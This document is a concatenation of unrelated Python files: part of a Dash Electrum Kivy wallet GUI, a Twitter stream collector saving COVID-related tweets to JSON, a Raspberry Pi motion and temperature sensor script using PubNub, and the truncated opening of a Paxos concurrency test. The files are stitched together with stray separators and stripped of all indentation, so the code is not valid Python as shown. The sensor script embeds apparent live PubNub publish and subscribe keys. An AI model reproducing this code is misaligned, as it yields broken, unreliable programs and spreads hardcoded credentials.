def create_new_collateral(self, coins):
def on_q_answered(confirmed):
if confirmed:
self.protected(_('Enter your PIN code to sign'
' new collateral transactions'),
self._create_new_collateral, (coins,))
w = self.wallet
psman = w.psman
info = psman.new_collateral_from_coins_info(coins)
q = _('Do you want to create transactions?\n\n{}').format(info)
d = Question(q, on_q_answered)
d.open()
def _create_new_collateral(self, coins, password):
w = self.wallet
psman = w.psman
wfl, err = psman.create_new_collateral_wfl_from_gui(coins, password)
if err:
self.show_error(err)
else:
self.show_info(f'Created New Collateral workflow with'
f' txids: {", ".join(wfl.tx_order)}')
def update_ps_btn(self, is_mixing, is_waiting):
ps_button = self.root.ids.ps_button
ps_button.icon = self.ps_icon(active=is_mixing, is_waiting=is_waiting)
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
util.register_callback(self.on_ps_callback,
['ps-data-changes',
'ps-reserved-changes',
'ps-not-enough-sm-denoms',
'ps-other-coins-arrived',
'ps-wfl-changes',
'ps-keypairs-changes',
'ps-state-changes'])
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
balance_sat = c + u + x
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self, is_ps=False):
from electrum_dash.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
min_rounds = None if not is_ps else self.wallet.psman.mix_rounds
include_ps = (min_rounds is None)
inputs = self.wallet.get_spendable_coins(None,
include_ps=include_ps,
min_rounds=min_rounds)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs,
min_rounds=min_rounds)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in duffs/kB
return format_fee_satoshis(fee_rate) + ' duffs/kB'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Dash Electrum', message,
app_icon=icon, app_name='Dash Electrum')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
@property
def testnet(self):
return self.electrum_config.get('testnet')
@property
def app_icon(self):
return ATLAS_ICON % ('logo-testnet' if self.testnet else 'logo')
def ps_icon(self, active=False, is_waiting=False):
if not active:
icon = 'privatesend'
elif not is_waiting:
icon = 'privatesend_active'
else:
icon = 'privatesend_waiting'
return ATLAS_ICON % icon
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, pr, on_complete):
status = False
if pr and pr.has_expired():
self.send_screen.payment_request = None
status, msg = False, _("Invoice has expired")
Clock.schedule_once(lambda dt: on_complete(status, msg))
return
need_broadcast = True if not pr or pr.need_broadcast_tx else False
txid = tx.txid()
try:
if need_broadcast:
coro = self.wallet.psman.broadcast_transaction(tx)
self.network.run_from_another_thread(coro)
else:
self.logger.info(f'Do not broadcast: {txid}, send bip70'
f' Payment msg to: {pr.payment_url}')
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except PSPossibleDoubleSpendError as e:
msg = str(e)
except PSSpendToPSAddressesError as e:
msg = str(e)
except BestEffortRequestFailed as e:
msg = repr(e)
else:
if pr:
self.send_screen.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
if need_broadcast:
status, msg = True, txid
else:
status, msg = ack_status, ack_msg
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, pr, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') +
':\n' + _('Electrum network not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
is_ps = getattr(screen, 'is_ps', None)
def amount_cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
if is_ps is None:
popup = AmountDialog(show_max, amount, cb=amount_cb)
else:
popup = AmountDialog(show_max, amount, is_ps=is_ps, cb=amount_cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
else:
self._addresses_dialog.update()
self._addresses_dialog.open()
def coins_dialog(self, filter_val=0):
from .uix.dialogs.coins_dialog import CoinsDialog
popup = CoinsDialog(self, filter_val=filter_val)
popup.update()
popup.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args, on_failure=None):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: on_failure(*args) if on_failure else None)
d.open()
else:
def q_callback(b):
if b:
f(*args, self.password)
elif on_failure:
on_failure(*args)
d = Question(
msg,
q_callback,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
backup_dir = util.android_backup_dir()
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def set_top_progress(self, value):
if 'top_prog_bar' in self.root.ids:
self.root.ids.top_prog_bar.value = value
def get_top_progress(self):
if 'top_prog_bar' in self.root.ids:
return self.root.ids.top_prog_bar.value
else:
return 100
def on_mn_list_updated(self, event, *args):
self._trigger_update_readiness()
def update_readiness(self, dt):
if self.get_top_progress() >= 100:
return
if self.network:
readiness = self.network.network_data_readiness()
else:
readiness = 0
self.set_top_progress(readiness)
|
colector.py
|
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.dirname(os.path.realpath(__file__))))
import requests
import urllib.request
import json
from io import StringIO
import time
import colect_exceptions
import pandas as pd
from datetime import datetime, timezone
import threading
class Colector():
"""**Colector class for Tweets streaming colect.**
Constructor that manages all actions related to interface with Twitter API.
It will call an enviornment variable called 'BEARER_TOKEN' in which the
bearer token from your account API needs to be stored.
To start data colection run:
``>>> Colector.run()``
To stop data colection press:
``CTRL + C``
Or close bash session.
**To set your enviornment variable open your terminal and run the
following line on bash:**
``export 'BEARER_TOKEN'='<your_bearer_token>'``
*Replace <your_bearer_token> with your own bearer token.*
"""
def __init__(self):
self._data = []
self.stream = []
self.response = None
self.rules = None
self.rules_for_filter = [
{"value": "COVID lang:pt", "tag": "Covid rule"},
{"value": "Saúde lang:pt", "tag": "Saúde rule"},
]
self.batch_number = 0
self.file_number = 0
self.archive_name_prefix = 'db_datalake_tw_covid_saude_'
self.archive_extension = '.json'
self._bearer_token = os.environ.get("BEARER_TOKEN")
self.url_base = "https://api.twitter.com"
self.url_search_rules = self.url_base + "/2/tweets/search/stream/rules"
self.url_search_stream = self.url_base + "/2/tweets/search/stream"
self.max_tweets_json = 200
self.timer_start = 0
self.batch_time_window_in_minutes = 30
self.waiting_seconds = 60
self.response_line = b''
self.whatchdog_counter = 0
self.keep_alive = True
def run(self):
"""**Subprocess to start the streaming and loading data into datalake
as JSON files containing 200 tweets each.**
The JSON files will be stored at .\data\ as
'db_datalake_tw_covid_saude_<batch_number>_<file_number>.json'.
:raises colect_exceptions.GetException: Authentication error occurred
when communication with Twitter API does not succeed.
"""
attempts = 1
if self.connect() and attempts >= 1:
try:
try:
self.delete_rules()
self.set_rules()
except:
raise colect_exceptions.GetException()
try:
self.timer_start = time.perf_counter()
self.get_stream()
print('\nStarting whatchdog.\n')
whatchdog = threading.Thread(target=self._stream_whatchdogs)
whatchdog.start()
print('\nStarting JSON files creation.\n')
save_stream_process = threading.Thread(target=self.save_stream)
save_stream_process.start()
attempts = 0
#self.save_stream()
except:
pass
except:
print('No internet connection.\n')
print('Verify if API bearer token on OS ambient variables.')
print('Verify your internet connection.')
time.sleep(30)
# whatchdog.join()
# save_stream_process.join()
time.sleep(5)
else:
# whatchdog.join()
# save_stream_process.join()
print('\nInternet connection down.\n')
print('\nRetry in 30 seconds...\n')
time.sleep(30)
print('\nRestarting processes.\n')
self.run()
def _bearer_oauth(self,r):
"""**Private method for Twitter's Bearer Token authentication.**
:return: It returns a Twitter API request class
This class will only be defined and used at
Twitter's API server-side for security reasons.
"""
r.headers["Authorization"] = f"Bearer {self._bearer_token}"
r.headers["User-Agent"] = "v2FilteredStreamPython"
return r
def connect(self):
try:
urllib.request.urlopen('https://twitter.com')
return True
except:
return False
def get_rules(self):
"""**HTTP Method to get rules of a twitter's filtered stream configured
on server side.**
:raises Exception: Failed to connect to Twitter.
Probably due to lack of API bearer token on OS ambient variables.
:return: Response from Twitter API with rules on server side.
:rtype: request.Response
"""
print('\nGetting rules from Twitter API server:\n')
self.response = requests.get(
self.url_search_rules,
auth=self._bearer_oauth,
)
if self.response.status_code != 200:
raise Exception(
"Cannot get rules (HTTP {}): {}".format(
self.response.status_code,
self.response.text)
)
self.rules = self.response.json()
print(json.dumps(self.rules))
return self.response
def delete_rules(self):
"""**HTTP Method to delete rules of a twitter's filtered stream configured
on server side.**
:raises Exception: Failed to connect to Twitter.
Probably due to lack of API bearer token on OS ambient variables.
:return: Response from Twitter API with informations of deleted rules
or errors on server side.
:rtype: request.Response
"""
self.get_rules()
if self.rules is None or "data" not in self.rules:
return None
ids = list(map(lambda rule: rule["id"], self.rules["data"]))
payload = {"delete": {"ids": ids}}
print('\nDeleting rules:\n')
self.response = requests.post(
self.url_search_rules,
auth=self._bearer_oauth,
json=payload,
)
if self.response.status_code != 200:
raise Exception(
"Cannot delete rules (HTTP {}): {}".format(
self.response.status_code, self.response.text
)
)
self.get_rules()
print(json.dumps(self.response.json()))
return self.response
def set_rules(self):
"""**HTTP Method to set rules of a twitter's filtered stream configured
on server side.**
:raises Exception: Failed to connect to Twitter.
Probably due to lack of API bearer token on OS ambient variables.
:return: Response from Twitter API with informations of rules setted
or errors on server side.
:rtype: request.Response
"""
payload = {"add": self.rules_for_filter}
try:
print('\nSetting rules for Twitter API:\n')
self.response = requests.post(
self.url_search_rules,
auth=self._bearer_oauth,
json=payload,
)
except:
print('\nSet rules failed. Verify your \
bearer token and connection.\n')
raise Exception
if self.response.status_code != 201:
raise Exception(
"Cannot add rules (HTTP {}): {}".format(
self.response.status_code,
self.response.text
)
)
self.get_rules()
print(json.dumps(self.response.json()))
return self.response
def get_stream(self):
"""**HTTP method to get stream data.**
This HTTP method gets data from the twitter's filtered stream with its
configured parameters and rules for filtering.
:return: Response from Twitter API with stream data.
:rtype: request.Response
"""
print('\nStart streamming.\n')
self.whatchdog_timer = time.perf_counter()
self.stream = requests.get(
self.url_search_stream,
auth=self._bearer_oauth,
params={"tweet.fields": "created_at",
"expansions": "author_id",
"backfill_minutes": 3},
stream=True,
)
print(self.stream.status_code)
if self.stream.status_code != 200:
raise Exception(
"Cannot get stream (HTTP {}): {}".format(
self.stream.status_code, self.stream.text
)
)
return self.stream
def _stream_whatchdogs(self):
"""**Keep-alive signal monitoring.**
This watchdog monitors the keep-alive signal from Twitter's streaming
and restarts the streaming if it disconnects.
:return: False to end process
:rtype: Bolean
"""
try:
keep_alive_period = time.perf_counter() - self.whatchdog_timer
if (keep_alive_period > self.waiting_seconds/6
and self.whatchdog_counter < 1):
print('\nKeep-alive whatchdog says:')
print('ping\n')
self.whatchdog_counter += 1
return True
elif (keep_alive_period > self.waiting_seconds
and self.keep_alive):
self.keep_alive = False
return True
elif (self.keep_alive_period < self.waiting_seconds):
return True
else:
try:
print('\nConnection lost. Waiting...\n')
self.whatchdog_counter = 0
self.keep_alive = True
self.whatchdog_timer = time.perf_counter()
time.sleep(self.waiting_seconds)
print('Try reconnecting.')
self.run()
except:
return False
except:
return False
def save_stream(self):
"""**Saves the stream into a list.**
The list (<self._data>) is a private variable and each tweet is saved
in one element of it.
Every time <self._data> reaches <self.max_tweets_json> numbers of
items, the data is saved into an JSON file withsave_jason_file()
method.
Every 30 minutes a new batch of files are created for db control
purposes.
"""
try:
for self.response_line in self.stream.iter_lines():
if self.response_line == b'':
print('\nTwitter says:')
print('pong\n')
self.keep_alive = True
self.whatchdog_timer = time.perf_counter()
self.whatchdog_counter = 0
self._stream_whatchdogs()
if self.response_line:
json_response = json.loads(self.response_line)
#print(json.dumps(json_response, indent=4, sort_keys=True))
self._data.append(json_response)
if len(self._data) % self.max_tweets_json == 0:
print('Storing data on batch {}, file {}'.format(
self.batch_number,
self.file_number))
if self.timer_30_minutes():
self.save_json_file()
else:
self.timer_start = time.perf_counter()
self.save_json_file()
self.batch_number +=1
self.file_number = 0
except AttributeError:
print("\nStream not started.\n")
time.sleep(self.waiting_seconds)
print("Starting stream.\n")
self.run()
def save_json_file(self):
"""**Create JSON file from stream data.**
Saves the stream into JSON files with the folowing name structure:
<self.archive_name_prefix>_<self.batch_number>_<self.file_number>.json
After .json creation, the <self._data> list is resetted.
"""
date = datetime.now(timezone.utc).strftime("%Y%m%d%H%M%S")
self.archive_name = (self.archive_name_prefix
+ str(self.batch_number)
+ '_'
+ str(self.file_number)
+ '_'
+ date
+ self.archive_extension)
pd.read_json(StringIO(json.dumps(self._data)),
orient='records').to_json(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'data',
self.archive_name),
orient='records')
self._data = []
self.file_number +=1
def timer_30_minutes(self):
"""**Timer function for 30 minutes.**
It will return True if the timer is running and False otherwise.
:return: True if time counter is less than 30 minutes and False
otherwise.
:rtype: Bolean
"""
timer_end = self.timer_start + self.batch_time_window_in_minutes*60
timer_now = time.perf_counter()
return timer_now < timer_end
def main():
colector = Colector()
colector.run()
if __name__ == "__main__":
main()
|
sensors.py
|
import RPi.GPIO as GPIO
import Adafruit_DHT
import time, threading, spidev
from pubnub.callbacks import SubscribeCallback
from pubnub.enums import PNStatusCategory
from pubnub.pnconfiguration import PNConfiguration
from pubnub.pubnub import PubNub
pnconfig = PNConfiguration()
pnconfig.subscribe_key = 'sub-c-c96cd480-3528-11e8-a218-f214888d2de6'
pnconfig.publish_key = 'pub-c-f141a42f-ae6d-4f11-bbaf-4bc7cb518b6c'
##########################
pnconfig.cipher_key = 'myCipherKey'
pnconfig.auth_key = 'raspberry-pi'
pnconfig.ssl = True
pubnub = PubNub(pnconfig)
myChannel = "RSPY"
PIR_pin = 23
Buzzer_pin = 24
LED = 18
dht11_pin = 5
sensorsList = ["buzzer"]
data = {}
# Define MCP3008 channels
light_channel = 0
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(PIR_pin, GPIO.IN)
GPIO.setup(Buzzer_pin, GPIO.OUT)
GPIO.setup(LED, GPIO.OUT)
# Open SPI bus
spi = spidev.SpiDev()
spi.open(0,0)
spi.max_speed_hz=1000000
# scales the given range into desired range
# https://stackoverflow.com/a/23157705/5167801
def scale(valueIn, baseMin, baseMax, limitMin, limitMax):
return ((limitMax - limitMin) * (valueIn - baseMin) / (baseMax - baseMin)) + limitMin
# Function to read SPI data from MCP3008 chip
# Channel must be an integer 0-7
def ReadChannel(channel):
adc = spi.xfer2([1,(8+channel)<<4,0])
data = ((adc[1]&3) << 8) + adc[2]
scaled = scale(data, 10, 700, 0, 100)
if (scaled <= 40):
GPIO.output(LED, True)
else:
GPIO.output(LED, False)
return scaled
def my_publish_callback(envelope, status):
# Check whether request successfully completed or not
if not status.is_error():
pass # Message successfully published to specified channel.
else:
print("Unable to send message:", status.error_data.information)
def publish(channel, msg):
pubnub.publish().channel(channel).message(msg).async(my_publish_callback)
def beep(repeat):
for i in range(0, repeat):
for pulse in range(60): # square wave loop
GPIO.output(Buzzer_pin, True)
time.sleep(0.001) # high for 1 millisec
GPIO.output(Buzzer_pin, False)
time.sleep(0.001) # low for 1 millisec
time.sleep(0.02) # add a pause between each cycle
def motionDetection():
data["alarm"] = False
print("sensors started")
trigger = False
while True:
publish(myChannel, {"light": str(ReadChannel(light_channel))})
time.sleep(1) # give some rest to Raspberry Pi
if GPIO.input(PIR_pin):
beep(4)
trigger = True
publish(myChannel, {"motion": "Yes"})
print('motion detected!')
time.sleep(0.5)
elif trigger:
publish(myChannel, {"motion": "No"})
trigger = False
if data["alarm"]:
beep(2)
def readDht11():
while True:
hum, tempC = Adafruit_DHT.read_retry(11, dht11_pin)
tempF = tempC * 9/5.0 + 32
publish(myChannel, {"atmos": {"tempC": str(tempC), "tempF": str(tempF), "hum": hum}})
class MySubscribeCallback(SubscribeCallback):
def presence(self, pubnub, presence):
pass # handle incoming presence data
def status(self, pubnub, status):
if status.category == PNStatusCategory.PNUnexpectedDisconnectCategory:
pass # This event happens when radio / connectivity is lost
elif status.category == PNStatusCategory.PNConnectedCategory:
# Connect event. You can do stuff like publish, and know you'll get it.
# Or just use the connected event to confirm you are subscribed for
# UI / internal notifications, etc
# send("")
publish(myChannel, "Device connected!!")
elif status.category == PNStatusCategory.PNReconnectedCategory:
pass
# Happens as part of our regular operation. This event happens when
# radio / connectivity is lost, then regained.
elif status.category == PNStatusCategory.PNDecryptionErrorCategory:
pass
# Handle message decryption error. Probably client configured to
# encrypt messages and on live data feed it received plain text.
def message(self, pubnub, message):
global data
print(message.message)
try:
msg = message.message
key = list(msg.keys())
if (key[0]) == "event": # {"event": {"sensor_name": True } }
self.handleEvent(msg)
except Exception as e:
print("Receiving message: ", message.message)
def handleEvent(self, msg):
global data
eventData = msg["event"]
key = list(eventData.keys())
if key[0] in sensorsList:
if eventData[key[0]] is True:
data["alarm"] = True
elif eventData[key[0]] is False:
data["alarm"] = False
if __name__ == '__main__':
pubnub.add_listener(MySubscribeCallback())
pubnub.subscribe().channels(myChannel).execute()
time.sleep(3)
sensorsThread = threading.Thread(target=motionDetection)
sensorsThread.start()
dhtThread = threading.Thread(target=readDht11)
dhtThread.start()
|
concurrency_test.py
|
#!/usr/bin/env python
# coding: utf-8
import os
import sys
import datetime
import time
import random
import threading
import socket
from it.paxoscli import PaxosClient, PaxosError, ids_dic, init_view, request, request_ex
from it.ngxctl import ngx_start, ngx_stop, ngx_restart
from it.sto import init_sto
g1 = ids_dic("1")
g2 = ids_dic("2")
g3 = ids_dic("3")
g12 = ids_dic("12")
g23 = ids_dic("23")
g13 = ids_dic("13")
g123 = ids_dic("123")
def err_rst( code ):
return { "err": { "Code": code } }
class ee( object ):
NoChange = err_rst("NoChange")
NoView = err_rst("NoView")
DuringChange = err_rst("DuringChange")
QuorumFailure = err_rst("QuorumFailure")
VerNotExist = err_rst("VerNotExist")
def randsleep( ratio=1 ):
time.sleep( random.random()*0.4*ratio )
def dd( args, *more_args ):
dt = str(datetime.datetime.now())
out( dt, *( args + list(more_args) ) )
def out( *args ):
os.write( 1, " ".join( [str(x) for x in args] ) + "\n" )
def integration_test():
cases = (
# func, args, result, result_filter
( "set",
(init_view,(1,(1,2,3)), {}),
(init_view,(2,(1,2,3)), {}),
(request,('get_view',2,),{"ver":1,"key":"view","val":[g123]}),
(request,('get',1,{"key":"i"}),{"ver":1, "key":"i"}),
(request,('set',1,{"key":"i", "val":100}),{"ver":2, "key":"i", "val":100}),
